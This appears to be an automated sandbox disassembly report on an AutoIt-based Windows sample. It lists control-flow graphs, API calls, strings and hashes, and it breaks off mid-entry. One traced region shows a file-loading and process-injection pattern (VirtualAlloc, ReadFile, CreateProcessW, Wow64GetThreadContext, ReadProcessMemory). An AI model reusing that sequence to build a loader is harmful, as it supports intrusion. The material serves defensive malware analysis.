                                                          control_flow_graph 767 c63633-c63681 769 c63683-c63686 767->769 770 c636e1-c636e3 767->770 772 c636e7 769->772 773 c63688-c6368f 769->773 770->769 771 c636e5 770->771 774 c636ca-c636d2 DefWindowProcW 771->774 775 c9d0cc-c9d0fa call c71070 call c71093 772->775 776 c636ed-c636f0 772->776 777 c63695-c6369a 773->777 778 c6374b-c63753 PostQuitMessage 773->778 780 c636d8-c636de 774->780 810 c9d0ff-c9d106 775->810 781 c63715-c6373c SetTimer RegisterWindowMessageW 776->781 782 c636f2-c636f3 776->782 784 c636a0-c636a2 777->784 785 c9d154-c9d168 call cc2527 777->785 779 c63711-c63713 778->779 779->780 781->779 789 c6373e-c63749 CreatePopupMenu 781->789 786 c9d06f-c9d072 782->786 787 c636f9-c6370c KillTimer call c6443a call c63114 782->787 790 c63755-c6375f call c644a0 784->790 791 c636a8-c636ad 784->791 785->779 803 c9d16e 785->803 795 c9d0a8-c9d0c7 MoveWindow 786->795 796 c9d074-c9d076 786->796 787->779 789->779 804 c63764 790->804 799 c9d139-c9d140 791->799 800 c636b3-c636b8 791->800 795->779 805 c9d078-c9d07b 796->805 806 c9d097-c9d0a3 SetFocus 796->806 799->774 808 c9d146-c9d14f call cb7c36 799->808 801 c636be-c636c4 800->801 802 c9d124-c9d134 call cc2d36 800->802 801->774 801->810 802->779 803->774 804->779 805->801 811 c9d081-c9d092 call c71070 805->811 806->779 808->774 810->774 815 c9d10c-c9d11f call c6443a call c6434a 810->815 811->779 815->774
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00C636D2
                                                          • KillTimer.USER32(?,00000001), ref: 00C636FC
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C6371F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C6372A
                                                          • CreatePopupMenu.USER32 ref: 00C6373E
                                                          • PostQuitMessage.USER32(00000000), ref: 00C6374D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: d2892de5776461d0c87056f773e134f5043a121a50fc679a33871078b364c054
                                                          • Instruction ID: 798fe4d2d45cde5fe47547eb6312d96f780d63f42800bdaefe5a55b021ebe2c7
                                                          • Opcode Fuzzy Hash: d2892de5776461d0c87056f773e134f5043a121a50fc679a33871078b364c054
                                                          • Instruction Fuzzy Hash: D44123B2204685BBDB345F68FD89F7D3A54FB61300F140129F512D63A5CAB09F42A275

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                          • API String ID: 1825951767-3513169116
                                                          • Opcode ID: 8cde5bca6477ccf1901b8388dd2e1d2718c52e4b3e8caac438078532ac66d362
                                                          • Instruction ID: 80e9fc6e926e25e6b34a80a5e1f016d93f6bf79f8d23092c925a97c602993db7
                                                          • Opcode Fuzzy Hash: 8cde5bca6477ccf1901b8388dd2e1d2718c52e4b3e8caac438078532ac66d362
                                                          • Instruction Fuzzy Hash: 53A15A7290026DDACF25EBA0DC95EEEB7B8BF24310F00052AF416B7191EF745A09DB60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 942 10157e0-101588e call 1013210 945 1015895-10158bb call 10166f0 CreateFileW 942->945 948 10158c2-10158d2 945->948 949 10158bd 945->949 957 10158d4 948->957 958 10158d9-10158f3 VirtualAlloc 948->958 950 1015a0d-1015a11 949->950 951 1015a53-1015a56 950->951 952 1015a13-1015a17 950->952 954 1015a59-1015a60 951->954 955 1015a23-1015a27 952->955 956 1015a19-1015a1c 952->956 961 1015a62-1015a6d 954->961 962 1015ab5-1015aca 954->962 963 1015a37-1015a3b 955->963 964 1015a29-1015a33 955->964 956->955 957->950 959 10158f5 958->959 960 10158fa-1015911 ReadFile 958->960 959->950 965 1015913 960->965 966 1015918-1015958 VirtualAlloc 960->966 967 1015a71-1015a7d 961->967 968 1015a6f 961->968 969 1015ada-1015ae2 962->969 970 1015acc-1015ad7 VirtualFree 962->970 971 1015a4b 963->971 972 1015a3d-1015a47 963->972 964->963 965->950 973 101595a 966->973 974 101595f-101597a call 1016940 966->974 975 1015a91-1015a9d 967->975 976 1015a7f-1015a8f 967->976 968->962 970->969 971->951 972->971 973->950 982 1015985-101598f 974->982 979 1015aaa-1015ab0 975->979 980 1015a9f-1015aa8 975->980 978 1015ab3 976->978 978->954 979->978 980->978 983 1015991-10159c0 call 1016940 982->983 984 10159c2-10159d6 call 1016750 982->984 983->982 989 10159d8 984->989 990 10159da-10159de 984->990 989->950 992 10159e0-10159e4 CloseHandle 990->992 993 10159ea-10159ee 990->993 992->993 994 10159f0-10159fb VirtualFree 993->994 995 10159fe-1015a07 993->995 994->995 995->945 995->950
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010158B1
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01015AD7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                          • Instruction ID: fa8a11e3674d73c5f2af140d23d961446e1a7e408b93c821d0df77955a8868ad
                                                          • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                          • Instruction Fuzzy Hash: 2CA14A71E40209EBDB14CFA4C894BEEBBB5FF89304F208199E541BB284D7799A40CF94

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1073 c89ae6-c89af2 call c83187 call c89d3c 1078 c89afc-c89b0f call c89d8a 1073->1078 1079 c89af4-c89afb call c89b5c 1073->1079 1078->1079 1084 c89b11-c89b19 call c887d5 1078->1084 1086 c89b1e-c89b24 1084->1086 1087 c89b53-c89b5b call c89b5c 1086->1087 1088 c89b26-c89b36 call c89de6 1086->1088 1088->1087 1093 c89b38-c89b52 call c89a33 GetCurrentThreadId 1088->1093
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 00C89AE6
                                                            • Part of subcall function 00C83187: EncodePointer.KERNEL32(00000000), ref: 00C8318A
                                                            • Part of subcall function 00C83187: __initp_misc_winsig.LIBCMT ref: 00C831A5
                                                            • Part of subcall function 00C83187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C89EA0
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C89EB4
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C89EC7
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C89EDA
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C89EED
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C89F00
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C89F13
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C89F26
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C89F39
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C89F4C
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C89F5F
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C89F72
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C89F85
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C89F98
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C89FAB
                                                            • Part of subcall function 00C83187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C89FBE
                                                          • __mtinitlocks.LIBCMT ref: 00C89AEB
                                                          • __mtterm.LIBCMT ref: 00C89AF4
                                                            • Part of subcall function 00C89B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C89AF9,00C87CD0,00D1A0B8,00000014), ref: 00C89C56
                                                            • Part of subcall function 00C89B5C: _free.LIBCMT ref: 00C89C5D
                                                            • Part of subcall function 00C89B5C: DeleteCriticalSection.KERNEL32(00D1EC00,?,?,00C89AF9,00C87CD0,00D1A0B8,00000014), ref: 00C89C7F
                                                          • __calloc_crt.LIBCMT ref: 00C89B19
                                                          • __initptd.LIBCMT ref: 00C89B3B
                                                          • GetCurrentThreadId.KERNEL32 ref: 00C89B42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: 1f9f6d78eb52f01580336b452be941501bcb894863c56622b369c96c39cbd57a
                                                          • Instruction ID: d276f01c75b6f7723a5221a608a12b1a34c7d2e933946cbd889c1a3daa73cce6
                                                          • Opcode Fuzzy Hash: 1f9f6d78eb52f01580336b452be941501bcb894863c56622b369c96c39cbd57a
                                                          • Instruction Fuzzy Hash: E6F062325097116AE63477747C076BA2790DB0273CF284A1AF460D61D2EF309941676C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1096 c639d5-c63a45 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C63A03
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C63A24
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00C63A38
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00C63A41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: ea06c0776b0775d17acf41ccb179cdcde5d31e57fccfdd2a3f0fccdca5cd1389
                                                          • Instruction ID: fa2a5bb528d8007fac23e2275f3b3d4f1eb5021ad04cf246e8f2574da5b15320
                                                          • Opcode Fuzzy Hash: ea06c0776b0775d17acf41ccb179cdcde5d31e57fccfdd2a3f0fccdca5cd1389
                                                          • Instruction Fuzzy Hash: 0CF03A71500390BEEA3057237C48F3B3E7DDBD6F60B00006EB900E62B4C6720842DAB4

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1097 10155c0-10156db call 1013210 call 10154b0 CreateFileW 1104 10156e2-10156f2 1097->1104 1105 10156dd 1097->1105 1108 10156f4 1104->1108 1109 10156f9-1015713 VirtualAlloc 1104->1109 1106 1015792-1015797 1105->1106 1108->1106 1110 1015715 1109->1110 1111 1015717-101572e ReadFile 1109->1111 1110->1106 1112 1015730 1111->1112 1113 1015732-101576c call 10154f0 call 10144b0 1111->1113 1112->1106 1118 1015788-1015790 ExitProcess 1113->1118 1119 101576e-1015783 call 1015540 1113->1119 1118->1106 1119->1118
                                                          APIs
                                                            • Part of subcall function 010154B0: Sleep.KERNELBASE(000001F4), ref: 010154C1
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010156D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: 1Q2VPAKER92EQOAITPJO9
                                                          • API String ID: 2694422964-2526339149
                                                          • Opcode ID: 94b5803e9ae62285d63d449f3b4a9e84c890f9adeb699dab800ae4b2089273b2
                                                          • Instruction ID: e01594e831b243bc40b9b4c4a9ac481b6ba1d732777a8ad84b591e3692eb4a23
                                                          • Opcode Fuzzy Hash: 94b5803e9ae62285d63d449f3b4a9e84c890f9adeb699dab800ae4b2089273b2
                                                          • Instruction Fuzzy Hash: 2051A130D04249DBEF11DBA4DC59BEEBBB8AF45304F044199E2487B2C1D6B91B48CBA5

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1121 c6407c-c64092 1122 c6416f-c64173 1121->1122 1123 c64098-c640ad call c67a16 1121->1123 1126 c9d3c8-c9d3d7 LoadStringW 1123->1126 1127 c640b3-c640d3 call c67bcc 1123->1127 1130 c9d3e2-c9d3fa call c67b2e call c66fe3 1126->1130 1127->1130 1131 c640d9-c640dd 1127->1131 1140 c640ed-c6416a call c82de0 call c6454e call c82dbc Shell_NotifyIconW call c65904 1130->1140 1142 c9d400-c9d41e call c67cab call c66fe3 call c67cab 1130->1142 1133 c64174-c6417d call c68047 1131->1133 1134 c640e3-c640e8 call c67b2e 1131->1134 1133->1140 1134->1140 1140->1122 1142->1140
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C9D3D7
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          • _memset.LIBCMT ref: 00C640FC
                                                          • _wcscpy.LIBCMT ref: 00C64150
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C64160
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 3942752672-1585850449
                                                          • Opcode ID: 75165580aee0f3bc49294e986f3935c1cf2347833609dc4d0bb217390da3765f
                                                          • Instruction ID: 0052b0a1a83049c01cebdc9eb52a6fe491a62d2bfc689a1c3ece48f1ef315b29
                                                          • Opcode Fuzzy Hash: 75165580aee0f3bc49294e986f3935c1cf2347833609dc4d0bb217390da3765f
                                                          • Instruction Fuzzy Hash: 3A31CF71008304AFD734EB60EC89FEE77E8AF50304F104A1AF595921E1DB709649D7A6
                                                          APIs
                                                            • Part of subcall function 00C64DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64E0F
                                                          • _free.LIBCMT ref: 00C9E263
                                                          • _free.LIBCMT ref: 00C9E2AA
                                                            • Part of subcall function 00C66A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C66BAD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 2861923089-1757145024
                                                          • Opcode ID: 040a93527664a26cb950b3c6d0a90cc53289ca9873e81d06fe56367dc2057872
                                                          • Instruction ID: 39b4e070dae3ac82cb773ddee3b5875d592635f63c1d763f3b6ee6554a472e3e
                                                          • Opcode Fuzzy Hash: 040a93527664a26cb950b3c6d0a90cc53289ca9873e81d06fe56367dc2057872
                                                          • Instruction Fuzzy Hash: 7D919F71900219EFCF14EFA4CC859EDB7B4FF18314F14452AF815AB2A1DB71AA05EB50
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C635A1,SwapMouseButtons,00000004,?), ref: 00C635D4
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C635A1,SwapMouseButtons,00000004,?,?,?,?,00C62754), ref: 00C635F5
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00C635A1,SwapMouseButtons,00000004,?,?,?,?,00C62754), ref: 00C63617
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 68a80c8d10838058966dd45f2702416d439596971beb330bdc9af4da5e8f0f05
                                                          • Instruction ID: 244f26960c7f9142bb2e7d020babe0f1afb727af3597c836223c1c2fe738d05c
                                                          • Opcode Fuzzy Hash: 68a80c8d10838058966dd45f2702416d439596971beb330bdc9af4da5e8f0f05
                                                          • Instruction Fuzzy Hash: 72114571614258BFDB208F68DC80AEEBBB8FF04740F008469F805DB210E271DF419BA4
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01014C6B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01014D01
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01014D23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680268739.0000000001013000.00000040.00000020.00020000.00000000.sdmp, Offset: 01013000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1013000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                          • Instruction ID: 2ed8ecd423a7818dcf9d70cb7e40a3266aba11925228ea37483cce086b88937f
                                                          • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                          • Instruction Fuzzy Hash: 57620D30A142589BEB24CFA4CC50BDEB776EF58300F1091A9D14DEB3A4E7799E81CB59
                                                          APIs
                                                            • Part of subcall function 00C64EE5: _fseek.LIBCMT ref: 00C64EFD
                                                            • Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9824
                                                            • Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9837
                                                          • _free.LIBCMT ref: 00CC96A2
                                                          • _free.LIBCMT ref: 00CC96A9
                                                          • _free.LIBCMT ref: 00CC9714
                                                            • Part of subcall function 00C82D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C89A24), ref: 00C82D69
                                                            • Part of subcall function 00C82D55: GetLastError.KERNEL32(00000000,?,00C89A24), ref: 00C82D7B
                                                          • _free.LIBCMT ref: 00CC971C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                          • Instruction ID: 183a99bda4263e733f18aafc9593474540aca0fdf5e1767623e3eec118477817
                                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                          • Instruction Fuzzy Hash: 64516FB1D04258AFDF249FA4CC85B9EBBB9EF48304F10449EF209A3241DB715A81DF59
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                          • Instruction ID: 68ca233be166be5f732dced856693e6dbfecc299b687b0d5e3c2f7fc41cf9d42
                                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                          • Instruction Fuzzy Hash: D041B775A007479BDB1CEF69C8809AE77A6EF4536CB24853DE825C7680EB70DE41CB48
                                                          APIs
                                                          • _memset.LIBCMT ref: 00C644CF
                                                            • Part of subcall function 00C6407C: _memset.LIBCMT ref: 00C640FC
                                                            • Part of subcall function 00C6407C: _wcscpy.LIBCMT ref: 00C64150
                                                            • Part of subcall function 00C6407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C64160
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00C64524
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C64533
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C9D4B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: c9bb11205c818d4533b9b28042d8ade3b41e6b813dede394714e2ed4b221777c
                                                          • Instruction ID: a651ffc8a8af62247f1e014857dd95fd1ac0bb0c7bd2e26d01db1c056b09f584
